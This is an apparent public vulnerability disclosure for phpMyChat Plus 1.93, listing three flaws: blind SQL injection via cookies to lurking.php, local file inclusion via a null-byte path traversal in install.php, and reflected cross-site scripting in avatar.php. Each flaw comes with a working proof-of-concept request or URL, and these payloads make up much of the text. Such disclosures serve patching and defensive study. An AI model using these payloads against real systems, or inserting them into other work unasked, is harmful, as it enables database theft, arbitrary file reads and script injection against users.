phpmychat plus 1.93 - Multiple Vulnerabilities



------------------------------------------------------------------------

Software................phpMyChat Plus 1.93
Vulnerability...........Blind SQL Injection
Threat Level............Serious (3/5)
Download................http://sourceforge.net/projects/phpmychat/
Discovery Date..........4/25/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A SQL injection vulnerability in phpMyChat Plus 1.93 can be exploited
to extract arbitrary data.


--PoC--

POST /plus/lurking.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Cookie: CookieUsername=[SQL]; CookieStatus=[SQL]; CookieRoom=x; CookieLang=x; CookieUserSort=x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------------------------------------------------------------------------
Software................phpMyChat Plus 1.93
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://sourceforge.net/projects/phpmychat/
Discovery Date..........5/14/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A local file inclusion vulnerability in phpMyChat Plus 1.93 can be
exploited to include arbitrary files.


--PoC--

http://localhost/plus/install/old/install.php?L=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

------------------------------------------------------------------------
Software................phpMyChat Plus 1.93
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://sourceforge.net/projects/phpmychat/
Discovery Date..........4/25/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A reflected cross-site scripting vulnerability in phpMyChat Plus 1.93
can be exploited to execute arbitrary JavaScript.


--PoC--

http://localhost/plus/avatar.php?pmc_password=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E